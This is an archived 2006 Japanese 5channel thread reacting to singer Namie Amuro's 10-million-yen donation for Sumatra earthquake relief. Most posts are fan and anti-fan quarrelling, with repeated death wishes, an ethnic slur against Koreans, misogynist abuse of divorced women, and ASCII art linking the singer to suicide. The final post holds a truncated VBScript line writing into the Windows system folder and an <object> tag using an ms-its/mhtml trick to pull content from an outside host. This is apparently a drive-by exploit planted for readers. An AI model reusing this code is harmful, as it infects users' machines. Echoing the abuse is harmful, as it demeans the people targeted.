5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

安室奈美恵(27) 1000万円をスマトラ地震被災者に寄付していたことが明らかに

1 :読者の声:2006/11/01(水) 22:23:34 ID:ME+uWTPU
歌手の安室奈美恵(27)が、インドネシア・スマトラ沖地震で被災した子どもたちのために、
日本ユニセフ協会に1000万円を寄付していたことが10日、明らかになった。
安室は2月3日にスマトラ沖地震災害の復興支援を目的として開催された音楽イベント「MTV ASIA AID」に出演しており、
その前日の2日に寄付。以前からライブに訪れた地の子どもたちのためにチャリティー活動を行っており、
今回も心遣いが表現された形となった。
安室はこれ以外にもライブで韓国と台湾を訪れた際、それぞれ500万円ずつ現地の恵まれない子供たちに寄付している。


http://www.daily.co.jp/gossip/2005/03/11/164502.shtml
http://oops-music.com/info/view_news.html?nid=16151
http://www.usfl.com/Daily/News/05/03/0310_011.asp?id=40482'
http://naoph.exblog.jp/2266387


2 :読者の声:2006/11/01(水) 22:30:25 ID:6GkDI76R
だれもがつっこむと思うが明らかもなにも当時普通に報道されてたし

3 :読者の声:2006/11/02(木) 05:46:25 ID:rCziJq0t
安室は人間的にも素晴らしい

4 :読者の声:2006/11/02(木) 07:01:28 ID:9hNdUkuT
>>2
知ったかするな陰キャ!!
安室凄いいい人ですねぇ。
か・ん・げ・き☆☆









てへっ!!

5 :読者の声:2006/11/02(木) 07:06:21 ID:PeCvr94u
安室ちゃん…眠れないよ
(´・ω・`)

6 :読者の声:2006/11/02(木) 09:30:17 ID:9hNdUkuT
>>2
クズは消えな!!

7 :読者の声:2006/11/02(木) 09:35:58 ID:GN+jTxRM
おれも500円寄付した

8 :読者の声:2006/11/02(木) 10:09:03 ID:i0Ob0J8l
去年も記事になってたのをまた立てたのはなぜ?

9 :読者の声:2006/11/02(木) 10:35:17 ID:WoKw5dql
安室ヲタがキモイから
宣伝しなきゃ完全に消えちゃうからね

10 :読者の声:2006/11/02(木) 10:43:42 ID:89K32k76
1000万って・・・少なっ!!

11 :読者の声:2006/11/02(木) 11:13:21 ID:9hNdUkuT
>>10
黙れよ貧乏人(笑)
愚民には100円ももったいないよ。

12 :読者の声:2006/11/02(木) 11:23:12 ID:3XgMgEYT
アメリカの同時多発テロの時も被災者に12万ドル(1200万円寄付してたよ

13 :読者の声:2006/11/02(木) 12:43:59 ID:UaKjHx/f
安室奈美恵は愛しい人を失う辛さを知っているから彼女がそういった行為をしても嫌みにならんし、素晴らしいってマジ思う。

14 :読者の声:2006/11/02(木) 12:46:20 ID:9hNdUkuT
>>13
うん、勝手に思っとけ。(笑)
わざわざネットに書く事じゃないな。
分かるな?返事しろコラ。

15 :読者の声:2006/11/02(木) 12:58:28 ID:UaKjHx/f
返事しねーよぼけがっっw

16 :読者の声:2006/11/02(木) 12:58:31 ID:rss43xDr
HEY3で昔「ハワイの別荘で8000万は安くないですか?」
と自慢げに言ってたアムロさんらしい大盤振る舞いですね

17 :読者の声:2006/11/02(木) 13:09:45 ID:jYPOYa6O
>>16
言ってた言ってたw
松ちゃんが、それはそうなんだけどな・・・と客の冷めた反応見ながら困った表情してたなw

18 :読者の声:2006/11/02(木) 13:10:49 ID:WoKw5dql
http://gazo14.chbox.jp/doujin-pink/src/1161067136481.jpg

19 :読者の声:2006/11/02(木) 13:11:25 ID:3XgMgEYT
ハワイにも寄付してたし 
貴婦人ならぬ寄付人だ

20 :読者の声:2006/11/02(木) 13:13:54 ID:89K32k76
1000万なんて屁でもないだろ

21 :読者の声:2006/11/02(木) 13:44:02 ID:e7HiVN9B
これ、別にアーティスト側が発表してるわけじゃなく、
寄付した機構が、その事件のプロモーション的な意味で発表してるの。
安室以外にもいろんな人が寄付してるけど、
それらは機構の広告みたいなもんなんだよ。

22 :読者の声:2006/11/02(木) 14:00:12 ID:LUGigIIe
トップクラスのアーティストに8000万の家なんて安いでしょw
うちは自営業の一般ピープルだけど、6、7000万の家買うし。

2ちゃんには貧乏人が多いのかww

23 :読者の声:2006/11/02(木) 14:43:41 ID:UaKjHx/f
↑嘘つき。

24 :読者の声:2006/11/02(木) 14:47:16 ID:LUGigIIe
うそじゃねーしww

貧乏人は心まで貧乏だなww

25 :読者の声:2006/11/02(木) 14:50:58 ID:C0NkmlIT
シューマッハーの100分の1か…
でも大したもんだな

26 :読者の声:2006/11/02(木) 15:08:06 ID:CHHpMxc6
>>24
アムロと同じ脳構造だなw
オムロもアムロヲタも痛っwww

27 :読者の声:2006/11/02(木) 15:10:43 ID:LfOsqiSS
売れてるアーに粘着して優越感に浸り他アーを貶しまくるのがここの次元だからなww

28 :読者の声:2006/11/02(木) 15:17:08 ID:LUGigIIe
貧乏人の僻みww

29 :読者の声:2006/11/02(木) 15:23:17 ID:LfOsqiSS
LUGigIIe ← こいつは6、7000万程度の中途ハンパな値の家を買うくらいで高慢になってるんだw
心が貧しい^^
貧乏人はその程度で自慢対象なんだなw

30 :読者の声:2006/11/02(木) 15:34:31 ID:LUGigIIe
お前等が8000万はスゲー超高いのに安室は安いって言っててムカつくみたいな事言い出したんだろw別に自慢じゃねーよww俺みたいな一般ピープルでもそんぐらいは買えるって教えてやっただけなのに勝手に自慢とかいって妄想しやがってww

さすが貧乏人
スーパーの安売りでも行って群がってろよ

31 :読者の声:2006/11/02(木) 15:37:35 ID:iiuv6414
貧乏人のカス同士で貶しあうスレですか
安室ヲタはキモイのばかり

32 :読者の声:2006/11/02(木) 15:40:07 ID:LUGigIIe
お前誰だよww

つーか、一つの罵倒ワードがでるとそれを使い回すんだなお前等ww

33 :読者の声:2006/11/02(木) 15:42:09 ID:iiuv6414
安室ヲタがキモイのは分かったからもう仕事に戻れよ貧乏人

34 :読者の声:2006/11/02(木) 15:44:38 ID:LUGigIIe
頭悪いんだな。

35 :読者の声:2006/11/02(木) 15:46:52 ID:RZ4nVoDA

何で今更こんなスレ立てんだよ。

アンチの自作自演は酷いな。


36 :読者の声:2006/11/02(木) 15:50:55 ID:LUGigIIe
アンチアー批判が出来なくなる→その根拠を示したヤツがムカつく→アンチアーヲタと妄想→アンチアーヲタキモいと言ってみる→今まで出回った罵倒ワードを使ってみる→バカ→ガキ

37 :読者の声:2006/11/02(木) 16:05:02 ID:GN+jTxRM
なんだかんだ寄付するのは良い事だ。みんなも1円でもして下さい。

38 :読者の声:2006/11/02(木) 16:05:10 ID:xPmkcDu6
安室に比べたら他のアーの体系はただデブにしか見えない

39 :読者の声:2006/11/02(木) 16:50:56 ID:f6AKb3Hh
ハワイまで行って何千万程度の別荘ってならそりゃ安いわな。普通に並以下だろ

安室さんが素晴らしい人だってのはよく分かったから新曲出せ新曲
社会の前にチャートに貢献しろ

40 :読者の声:2006/11/02(木) 17:57:57 ID:GN+jTxRM
また寄付してきましたよ

41 :読者の声:2006/11/02(木) 18:24:30 ID:9hNdUkuT
喧嘩するなって、オタクズども。(笑)
所詮お前らの腐ってる人生じゃどうあがいても安室に勝てないんだから、諦めろ。な?

6、7000万円の家買ったとかいう妄想お荷物陰キャなんか無視して、楽しく喋ろうな。
な?偉大なる愚民どもよ。
分かったら返事しろ雑魚ども!!コラ!!しばくぞ雑魚!!

42 :読者の声:2006/11/02(木) 18:59:11 ID:9hNdUkuT
>>41
あんた世の中の事をよく分かってるな。
あんた絶対周りからの人望が厚くて男前で全体的にかっこいいだろ?
HaHaha。隠しても無駄だぜ。
俺には分かるんだ。
このスレのクズどもとは違う。あんたは天才だよ!!

43 :読者の声:2006/11/02(木) 19:03:22 ID:RKS49zls
>>41>>42
自演乙

44 :読者の声:2006/11/02(木) 19:14:08 ID:l6KNGS1j
ここに大量に書きこめ
http://jbbs.livedoor.jp/computer/33046/

45 :読者の声:2006/11/02(木) 19:30:04 ID:9hNdUkuT
>>43
もっと面白い事書こうな。オタク野郎。
自演なんて誰もが分かってるんだよ。
クズはくたばれクズ!!

46 ::2006/11/02(木) 19:32:46 ID:VK/7iumM
こいつクズだね

47 :読者の声:2006/11/02(木) 19:57:20 ID:RKS49zls
>>45
憐れだ

48 :読者の声:2006/11/02(木) 20:58:42 ID:9hNdUkuT
ヒャハハ、オウム返ししかできない雑魚がいきがんなよゴミ!!(笑)

ゴミども、相手してやってるだけでも感謝しろよゴミども。(笑)

あ〜楽しい嬉しいおかしい〜!!!

49 ::2006/11/02(木) 21:30:46 ID:ZQZBCfv8
…で?

50 :読者の声:2006/11/02(木) 21:50:45 ID:uPXvh9RX
ここでしか物が言えない奴がわめいているだけのスレなのですね。
ここは、面と向かうと何にも言えない奴ばかりがいるスレですね、
それでいいですよ、それが現実、
ここで言いたいこと言ってストレスを取るがいい
どうせ他人の前では何も言えないのだから・・・


51 ::2006/11/02(木) 21:57:28 ID:qx9CDSD5
ふーん

52 :読者の声:2006/11/02(木) 22:47:49 ID:BRt4u+ce
尊敬する〜

53 :読者の声:2006/11/02(木) 23:10:02 ID:9hNdUkuT
は?お前絶対脳障害だろ。
ネットっていうのはそういう場所だろ。

常識だよね、クズ野郎!!しばくぞコラ!!

54 :読者の声:2006/11/02(木) 23:12:48 ID:kI0sZWKv
>>2
そりゃ新潟の地震だろ・・・

55 :読者の声:2006/11/03(金) 00:23:35 ID:hL69TvKn
新潟、ニューヨーク、ハワイ、スマトラ、韓国、台湾

知られてるだけでもこれだけ1000万円単位の寄付をしてるわけか
合計したら1億以上はしてるだろうな

56 :読者の声:2006/11/03(金) 09:06:59 ID:C0tw5kVa
みんなもしなきゃ

57 :読者の声:2006/11/03(金) 09:56:54 ID:/wv28U21
明らかにしないくていいよwww
善意でやってるなら最後まで黙ってろよwww

58 :読者の声:2006/11/03(金) 11:07:37 ID:8cA6iV7/
芸能人なんだから言わなくても勝手にバレるだろ。頭悪。

59 :読者の声:2006/11/03(金) 11:26:49 ID:9xG6viAj
安室ヲタ死ね

60 :読者の声:2006/11/03(金) 11:52:03 ID:zWy7Ryw3
1000万も寄付できる余裕あるんだな
作詞印税も作曲印税もないのに


61 :読者の声:2006/11/03(金) 11:55:26 ID:zWy7Ryw3
この件に関して俺の安室に対する好感度は全く上がらない
チンポも上がらない

62 :読者の声:2006/11/03(金) 11:56:25 ID:VLg2DcL9
>>60
そこそこしてる作詞印税ならあるだろうが
なんと言っても売ってきたCDの売上が半端ないからね
社長が逮捕された時の裁判で、ミリオンヒットが出るたびにボーナス3億もらってたらしいし
ミリオン10作品あるから、3億×10、それプラス基本給が毎年1億以上はあるから

63 :読者の声:2006/11/03(金) 12:00:42 ID:VLg2DcL9
訂正

社長が逮捕された時の裁判で、ミリオンヒットが出るたびにボーナス3億もらってたことがバレちゃったし、

64 :読者の声:2006/11/03(金) 12:29:15 ID:C0tw5kVa
募金に協力しようとローソンに行って募金箱を見たら

小銭がたくさん入ってた

小銭の数だけ優しい人の数を見たような気がした。


みんなもしなきゃ

65 :読者の声:2006/11/03(金) 12:33:15 ID:znqpl+kE
安室すごいな見直した

66 :読者の声:2006/11/03(金) 12:37:21 ID:1uDXFYIy




安 室 ち ゃ 〜 ん !  元 気 を く れ て あ り が と う 









67 :読者の声:2006/11/03(金) 13:08:47 ID:IwJbdcYA
もっと稼いでるハマさんはもっともっと寄付したんだろうね

68 :読者の声:2006/11/03(金) 13:19:23 ID:1boOCa5+
>>1
安室は29歳でしょ。

69 :読者の声:2006/11/03(金) 14:09:05 ID:0gtv4Ye9
>>64
私も最近は一人でコンビニ行った時とかは募金するようにしてる
安室のこういう記事読んで、自分がもし貧しくて今日生きれるかどうかもわからない立場だったらと考えはじめたから

70 :読者の声:2006/11/03(金) 14:28:08 ID:f89lNG2m
16 読者の声 New! 2006/11/02(木) 12:58:31 ID:rss43xDr
HEY3で昔「ハワイの別荘で8000万は安くないですか?」
と自慢げに言ってたアムロさんらしい大盤振る舞いですね




安室の発言とは思えないわw

71 :読者の声:2006/11/03(金) 14:49:41 ID:aTDFgsfC
マドンナやアギレラといった海外セレブの寄付が流行ってるからな〜
寄付って続けないと単なる偽善に終わるよねw

72 :読者の声:2006/11/03(金) 15:45:10 ID:J0/oMykN
安室、昔から寄付してるよスマトラの寄付が分かってから今までの寄付も発覚した

73 :読者の声:2006/11/03(金) 15:51:23 ID:B+iWDkAJ
>>70 部屋が何十個もあるのに、その値段は安くない?
って感じだったよ。ハワイじゃなくて本土

74 :読者の声:2006/11/03(金) 16:27:52 ID:4IKO1Bw5
安室は高いとも安いとも言ってないね。
ただ見に行ったついでに値段聞いたと。

75 :読者の声:2006/11/03(金) 16:55:25 ID:9xG6viAj
安室ヲタ死ね

76 :読者の声:2006/11/03(金) 17:22:39 ID:xmSbV4NS
>>16
それ見てたけどニュアンス違う。
別荘の内容から言ってその値段は安くないかって感じだった。
斜めに捉えすぎw




77 :読者の声:2006/11/03(金) 21:52:15 ID:Ux7CV7M1
安室はチャリティ意識高いお

78 :読者の声:2006/11/03(金) 22:32:01 ID:P94ATiRz
>>71
沖縄サミットあたりから自ら公にせず、
何度も寄付を続けている安室は本当に素晴らしい人間だよな。
あと寄付は流行りとかいう問題ではないよ。

79 :読者の声:2006/11/04(土) 00:39:08 ID:IHvOZ+0s
天災によって寄付を必要とする人々
明日は我が身。
僕もあなたも何もしなくても。
あなたの為の寄付に感謝しますか?偽善といいますか?

80 :読者の声:2006/11/04(土) 00:54:13 ID:vFl/zNO0
>>16
俺も見た事がある
客の静まった反応に松ちゃん困ってた

81 :読者の声:2006/11/04(土) 08:36:07 ID:aS2EY/mK
ワザと困った振りしてたんでしょ。あのおっさんよくやるじゃん

82 :読者の声:2006/11/04(土) 15:59:41 ID:iLgSMarJ
うん

83 :読者の声:2006/11/04(土) 16:17:03 ID:vFl/zNO0
好きなアーだから何も感じないのかw
興味ないアーが8000の別荘が・・・とか自慢げに言ってたらなんだこいつと思うだろww

84 :読者の声:2006/11/04(土) 20:16:28 ID:J1kMwfp/
>>83
アホな盲目ヲタが必死にCDを買うおかげでそんなもんも買えちゃうわけだからな
アホなサイクルだな

85 :読者の声:2006/11/04(土) 20:27:04 ID:loFPHPs0
安室ヲタ痛い

86 :読者の声:2006/11/04(土) 21:02:42 ID:aS2EY/mK
必死にCD買う奴なんていないよww必死にCD買うって意味不明ww頭悪。

87 :読者の声:2006/11/04(土) 21:16:29 ID:y/LcmBF3
なんだよ27歳って
もう29だよ
いつまで引っ張ってんだよ

88 :読者の声:2006/11/04(土) 21:49:04 ID:otKpvEC0
安室ヲタは相変わらず低脳www

89 :読者の声:2006/11/04(土) 22:06:45 ID:IoL2dTRp
書き込みないから(´・ω・)カワイソス
http://jbbs.livedoor.jp/computer/33046/

90 :読者の声:2006/11/05(日) 02:35:01 ID:o4wmkehS
あたし一生、奈美恵について行くわ
さすがあたしが見込んだ人だわ
小室のときもよかったけど
最近の曲は芸術作品みたい
来年のツアーは行けるだけ行くわ!
今回沖縄行けないのは残念
奈美恵ファンもみんなが支払ったお金が
こうゆう使い方をされることは賛成だよね?

91 :読者の声:2006/11/05(日) 02:56:01 ID:Bk6xIhcV
賛成だよ。つか自分で稼いだ金を何に使おうが他人がどーたらゆうもんじゃねーよ。どんだけ人間としての器小せぇんだw

92 :読者の声:2006/11/05(日) 03:02:52 ID:/I5DFl57
浜崎がそれを言ったらお前らも軽くムカツクだろ?w

93 :読者の声:2006/11/05(日) 07:30:12 ID:JdZfp49V
>>92
思わん

94 :読者の声:2006/11/05(日) 09:24:50 ID:gwouzF7o
募金ネタ大嫌い。あゆも安室ちゃんもスターだから下界でガタガタ言われるのは仕方がないけど醜いw



で、こんな事でいちいちスレ立てんなよw

95 :読者の声:2006/11/05(日) 13:43:09 ID:uAEFQH5k
安室ヲタさっさと死ね婆共

96 :読者の声:2006/11/05(日) 15:05:33 ID:vAtPyq8i
↑粘着アンチババア登場w

97 :読者の声:2006/11/05(日) 15:07:01 ID:g93D4PA6
アムロ ハワイの別荘が8000万って安くなぁ〜〜いですか??

客 し〜ん・・・

松本 それはそうなんだけどな・・・
   ほら〜お前がそんないうから客が引いてるで〜

客 苦笑い

アムロ 優越感な顔で客を見下ろすアムロ

松本 俺は庶民派やからなワカラン

客 笑

98 :読者の声:2006/11/05(日) 15:34:01 ID:WbMu00q2
安室は自分の存在を誇示させるような事をたまに言うからw
今さらそれを掘り出さないでいいよ^^

99 :読者の声:2006/11/05(日) 16:13:32 ID:dm8JJMVV
安室ヲタキモッ

100 :読者の声:2006/11/05(日) 16:45:31 ID:uA5XviBf
邦ソロ板の安室スレ見てるとDQNなヲタ増えたなと実感する
沢尻も安室ファンらしいが公表しないでほしい
安室のイメージダウン

101 :読者の声:2006/11/05(日) 16:47:21 ID:0XeJSJY/

エイベアーのヲタになるのは今も昔もDQN

102 :読者の声:2006/11/05(日) 17:45:25 ID:uAEFQH5k
アムロ ハワイの別荘が8000万って安くなぁ〜〜いですか??

103 :読者の声:2006/11/05(日) 18:17:48 ID:t4a0gW6u
どうでもいいけどハワイの話じゃないよ。

『LAにレコーディングの休日の時にオープンハウスをみにいって
最初は、1億1千万で売ってたんです。
でも、私達が見に行ったときは8千万に下がってて』
ってなのが事実だけど・・・

104 :読者の声:2006/11/05(日) 18:22:27 ID:0XeJSJY/
HEY3と言えば
祭りの中自分の曲をラジカセでガンガンに流して注目を集めようとしてたってのもあったな

105 :読者の声:2006/11/05(日) 18:39:24 ID:G3fuIZ/L
>>104
視聴者は見た!みたいなコーナーで本人も認めてたなそれww

106 :読者の声:2006/11/05(日) 18:48:00 ID:FWUjXY1v
シューマッハは10億円寄付したお( ^ω^)

107 :読者の声:2006/11/05(日) 20:10:42 ID:BBYIX4oZ
奈美恵の人間性の良さは芸能界でも有名
また一般人の目撃情報でも悪い噂は一切なし

108 :読者の声:2006/11/06(月) 00:16:34 ID:HcBzWu8V
安室は今年29のはずだぞ

109 :読者の声:2006/11/06(月) 07:51:24 ID:wlFbd9C/
っていうか、この記事って2年くらい前のものでしょ?
だkら、27歳なんだよ。

昨日のツアー本土ファイナル@大阪、ものすごくよかった
バイオレットソースとかUh..Uh...とかかっこよすぎ!!!

110 :読者の声:2006/11/06(月) 08:34:49 ID:V3pzumJ1
2005年だから去年だと思う
去年は27だった

111 :読者の声:2006/11/06(月) 10:07:40 ID:mYKHTu+w
昨日はサプライズでNEVER ENDを歌った。
きっと沖縄でも歌うからそうなったのかもね。

112 :読者の声:2006/11/06(月) 11:23:44 ID:eAa6oVuT
沖縄いきてぇ

113 :読者の声:2006/11/06(月) 13:41:10 ID:sVF8KItW
沖縄ではスパモン時代の
1.スーパーの開店記念イベントライブ
2.スパモンブレイク記念ライブ
についで、3回目にして初のソロライブだね!!

114 :読者の声:2006/11/06(月) 13:54:07 ID:IIJU/Rmh
あむろ いまだのきっとナンバーワン

115 :読者の声:2006/11/06(月) 18:22:29 ID:RdFRmcaG
海外より国内を

116 :読者の声:2006/11/06(月) 22:38:38 ID:XyHkrbQ5
盲目アムロヲタは相変わらず痛い

117 :読者の声:2006/11/07(火) 11:06:26 ID:v5C7m4y6
私のエロ画像です。恥ずかしいけど公開しちゃいます。
http://gotodmc.ath.cx/uploader/src/up0139.jpg
http://gotodmc.ath.cx/uploader/src/up0140.jpg

118 :読者の声:2006/11/07(火) 23:28:16 ID:DZ3Y62sE
>>97>>98>>102









捏造乙w

119 :読者の声:2006/11/08(水) 00:05:24 ID:rSYnpeQA
盲目アムロヲタは相変わらず痛い


120 :読者の声:2006/11/08(水) 00:15:04 ID:vk17+wDN
>>1









捏造乙w

121 :読者の声:2006/11/08(水) 01:28:50 ID:ch6nRuDf
息を吐く様に嘘を吐く糞アンチ乙

122 :読者の声:2006/11/08(水) 02:25:35 ID:t7RBRbcn
こんなスレ立てたら安室ヲタが叩かれて当然だろw
安室を鼻にかけて他アー叩きが凄まじいからな安室ヲタは。

安室はいいけどヲタは最低

123 :読者の声:2006/11/08(水) 02:28:11 ID:nS6qq90I
醜い事は全て見ない事にする盲目アムロヲタ痛すぎ

124 :読者の声:2006/11/08(水) 09:04:36 ID:deqg5kYJ
アムロヲタに苛められた粘着

125 :読者の声:2006/11/08(水) 09:18:12 ID:55fiZw8J
盲目アムロヲタは相変わらず痛い

126 :読者の声:2006/11/09(木) 13:08:45 ID:mfbDG7Vg
偽善者安室もイタイ

127 :読者の声:2006/11/10(金) 10:24:31 ID:ZnReNmou
結論
安室も信者もアホ

128 :読者の声:2006/11/10(金) 10:56:42 ID:+XT4dsJ1
>>125-127

粘着アンチおばさん気が済んだか?

129 :読者の声:2006/11/10(金) 11:24:38 ID:6QRwX/og
盲目アムロヲタは相変わらず痛い

130 :読者の声:2006/11/10(金) 18:29:14 ID:vjnB0hiO
         ,,-―--、
        |:::::::::::::;;;ノ  / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
        |::::::::::( 」 < 盲目アムロヲタは相変わらず痛い
        ノノノ ヽ_l   \______________
       ,,-┴―┴- 、    ∩_
     /,|┌-[]─┐| \  (  ノ
      / ヽ| |  バ  | '、/\ / /
     / `./| |  カ  |  |\   /
     \ ヽ| lゝ    |  |  \__/
     \ |  ̄ ̄ ̄   |
      ⊂|______|
       |l_l i l_l |
       |   ┬    |

131 :読者の声:2006/11/10(金) 19:16:06 ID:ZnReNmou
結論
安室も信者もアホ

132 :レコード店長 ◆tr.t4dJfuU :2006/11/10(金) 20:07:06 ID:YEijl24J
「 丸々コピー&ペースト 」連続投稿 
「 wwwwwww〜〜〜〜〜...」連続投稿  
「 ハンドルネーム変更」連続投稿、等を見かけた場合は....
” 邦楽・洋楽アーティストを中傷する人 ” です。

悪質な場合、営業妨害として警察に指名手配しますので
スルーして下さい。

投稿前は、必ず2ちゃんねるのガイドラインを見て承諾して下さい。
( 掲示板上方の「書き込む前に読んでね」をクリックして下さい。)
http://info.2ch.net/before.html

133 :読者の声:2006/11/11(土) 08:41:24 ID:EUHGI1na
離婚女は氏ね!

134 :読者の声:2006/11/11(土) 21:50:19 ID:1QomD0ua
庶民は10円でもいいよね

135 :読者の声:2006/11/11(土) 22:25:28 ID:AqFXQsmY
すごうい


136 :読者の声:2006/11/12(日) 12:10:01 ID:yHnbACZX
1000万ポンと出すくらい金持ってますよ的なアピールって事でおk??

137 :読者の声:2006/11/12(日) 13:50:46 ID:oaQYS01X
こういうのは墓場まで持っていって、
死んでから明らかにされるのがカッコいいのに。

138 :読者の声:2006/11/12(日) 14:55:10 ID:S1h2Zym1
確か極秘でやったのが、
結局有名人すぎたからしばらく経ってからバレちゃったんだよね

139 :読者の声:2006/11/13(月) 23:53:36 ID:BEjFMULW
あれ?私より3つ年上のはずなのに・・・なんで27歳なの?

140 :読者の声:2006/11/14(火) 00:06:03 ID:Jbj7ZJJf
太っ腹!
いやウエストは細いけどw

141 :読者の声:2006/11/14(火) 01:14:07 ID:jFFJC1HF
【やらせ】小泉政権が開いた計174回のタウンミーティングは世論操作の場であった疑いが強まった

★やらせタウンミーティングは文科省ぐるみ

 小泉内閣が「国民との直接対話」をうたい文句に導入したタウンミーティングの
化けの皮が次々とはがされている。
 今度は政府演出による“やらせ質問”が発覚した「教育改革タウンミーティング」
で、教育基本法を所管する文科省が質問案を作るなど深く関与し、世論を誘導して
いた実態が明るみになった。

 教育改革ミーティングは03年から全国で8回開かれた。
 今年9月に青森県八戸市で開いたタウンミーティングで“やらせ質問”があった
ことが発覚。慌てた内閣府が調べたら、岐阜、愛媛、和歌山、大分の4カ所でも
同様のやらせがあったことが判明した。それら質問案には、教育基本法改正や国立
大学の法人化を問うものなど、文科省の意向に沿う内容が盛り込まれていた。

 10日の朝日新聞によると、教育改革タウンミーティングはすべて、文科省から
内閣府へ出向した3人が交代で担当。文科省に相談して質問案を作成するなどして
仕切っていたという。
 小泉政権が開いた計174回のタウンミーティングは世論操作の場であった疑い
が強まった。

ttp://news.www.infoseek.co.jp/gendainet/society/story/13gendainet02029282/


142 :読者の声:2006/11/14(火) 07:36:15 ID:BjiytV0Z
>139
A年前の記事だから

143 :読者の声:2006/11/14(火) 12:28:44 ID:TDdOHXC4
離婚女は犯罪の根源
氏ねばいい

144 :読者の声 :2006/11/14(火) 12:45:54 ID:UQ47ZJfh
スカトロ自身

145 :読者の声:2006/11/14(火) 14:20:08 ID:G0cAHmK9
安室、姦国人並みの偽善者ですね

146 :読者の声:2006/11/14(火) 16:33:58 ID:DEcCT9g6
偽善でも1000万を寄付してむこうの人もいくらかは助かるんだから別にそこまで叩かなくても良いとおもうんだが


147 :読者の声:2006/11/14(火) 18:24:30 ID:HIe/BytH
そりゃ寄付も出来ない人間の僻みだからw

148 :読者の声:2006/11/14(火) 20:01:51 ID:BWWbXN6v
そうそ。叩くことがないからって本当不謹慎だよね。

149 :読者の声:2006/11/14(火) 20:36:09 ID:O99BANwA
寄付自体は素晴らしい事だけど
安室の発言とか見てると安室自体は好きになれないね

150 :読者の声:2006/11/14(火) 20:53:38 ID:93ufnz4c
安室より安室ヲタのほうが何倍もうざい

151 :読者の声:2006/11/14(火) 21:52:36 ID:610Ehj5E
盲目安室ヲタが痛いのは言うまでもない

152 :読者の声:2006/11/15(水) 06:39:31 ID:/ijkaQAA
あれだけ売れたのにたった1000万かよw
トップスターなら億単位はいくだろ

153 :読者の声:2006/11/15(水) 08:11:35 ID:X4fS1Ylj
       ____,....
  ,. ‐';ニ"´ニイ:i!:、ヽ:.:`ヽ、_
/.:///:.イ:.|:|:|i:.:ヽ:.、ヽ:、ヽ、
:.:/:/./://:|:.:|:!:|:|i:.:.:゙,:.:.:.リ:.ヽ\
./:.:/:/:.:.//ハ:.:i:.:l:.:.i:.:.:i:.ヽ`:|:!:.:ヽヽ
:.:/.:/:.:./:.l!::.:.ハ:.V:.;、:i:.:.|:.:.ヽ|:.i:.i:.:.',:.゙:,
/l!:/.:.:/|!.|:.:./ハ:',:|:ヽ:、|!:.:.:.ハ:.||:.',:.i:、:',
!|l,:!:.:.:.:|.| |レ/∧:l:メ!:.ヽ:.:|:.|/:.i:.リ:、',:|:.i:.i
:|l.|:.:.:.:|!.:|:.//¬i:.{‐、.:|.ト、:l:|、:.!:.:.i:ヽ|:.|:|
i:.:| |:.:.|l:.:.l/ィ示ヽミ !.メ| 〉ヽ!:|_!:.|:i.:N:.|
:.:.l!:l、.:.:l、:l`ヽ::ノ_, ' リ |i |.,.ィl、.|::!||:.メ:リ
、:.l!.N、:い!.        !く:::ソ } |:.:|/:/
!:i、.i!リ ヽ!         , `~ /|:ノ:/
:.i|:iN  `      .: ノ  /:!レ/′
:、l:|ハ     、____    /::i/'′
小| ヽ     `''ー‐`''  /|/l
:.:トヽ  \       /                      r‐-、r‐-、r‐-、r‐-、
N|`ヽ   ヽ、    , '´      ┌───────┤  ||  ||  ||_..._|‐───────┐
``'''‐- ..,_   iT"´           | ー──────‐ |_...._||  ||_...._|ヽ_,ノ. ─────── |
、_    ``''‐N、           | 安室奈美恵    .ヽ_,.ノ|.-‐.|ヽ_,ノ                   |
 `ヽ、      i          | ─────────. `ー' ー‐─────────‐ |
、   `ヽ、   |           | 飛び降り自殺         :                 |
、`ヽ、   \  |          | ──────────‐ :. ──────────‐ |
 \ \   ヽ.|ヽ         |                   :                  |
   ヽ ヽ   |  \          | ──────────‐ :. ──────────‐ |


154 :読者の声:2006/11/15(水) 11:29:16 ID:3nHRbOMl
明らかにもなにも当初から話題だったが

155 :読者の声:2006/11/18(土) 17:53:52 ID:ygaD+qMP
  

156 :読者の声:2006/11/20(月) 12:28:14 ID:po2EkTU/
  (  ´)`Д) )) < ハァハァ こんな所でダメェ
  /  つ つ  < 大丈夫だって,こんな糞スレ誰も来ねえよ
(( (_(_  ノ ノ
  し∪ ∪

 Σ( ゚д゚ )゚д゚)
  /  つ つ
  (_(_  ノ ノ
  し∪ ∪

  ( ゚д゚ )゚д゚)
  /  つ つ
(( (_(_  ノ ノ
  し∪ ∪


157 :読者の声:2006/11/20(月) 14:28:12 ID:D0xlVJ5O
 

158 :読者の声:2006/11/20(月) 22:17:55 ID:nZuQfoWc
スマトラ?

159 :読者の声:2006/11/22(水) 01:53:07 ID:akt2S4Vs
国内でいくつも震災あったのにそっちにはやらないんですか?

160 :読者の声:2006/11/23(木) 13:14:03 ID:FSw8Eg+p
>>159
日本人に援助しても感謝する奴は少ない
逆に援助されなかったと妬む基地外が多い

161 :読者の声:2006/11/23(木) 22:21:32 ID:ksIF1eXo
   

162 :読者の声:2006/11/24(金) 23:04:58 ID:BEY/Bbno
落ち目だからしかたない

163 :読者の声:2006/11/25(土) 13:37:59 ID:s3532TiQ
すご〜い
お金持ちで人間性もすばらしい

164 :読者の声:2006/11/25(土) 19:00:04 ID:1UmF9Bsl
ほんとに27歳だったっけ?俺と同い年?俺が中学生の頃すでに活躍してた覚えがあるんだが。
ヘタすると、ハマより年下ということにならん?

165 :読者の声:2006/11/25(土) 20:23:27 ID:tEFddoz9
これ今年の記事じゃないから。。。

166 :読者の声:2006/11/26(日) 18:38:41 ID:OkEHUVpS
チャートヲタ=中2病

167 :読者の声:2006/11/27(月) 08:04:50 ID:sakwhEBL
初めてヘイヘイヘイに出たのが16才だからな
長いこと活躍してるよ

168 :読者の声:2006/11/27(月) 10:14:31 ID:f+SuGml0
飯島愛って34?

169 :読者の声:2006/11/27(月) 14:42:44 ID:TVtQuSTd
>>167
非処女宣言ナツカシス

170 :読者の声:2006/11/30(木) 12:42:21 ID:Ey3F98cN
出来婚即離婚女市ね

171 :読者の声:2006/11/30(木) 13:49:10 ID:Oz+u/O92
ほほ

172 :読者の声:2006/11/30(木) 14:25:03 ID:9vvM1xDK
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
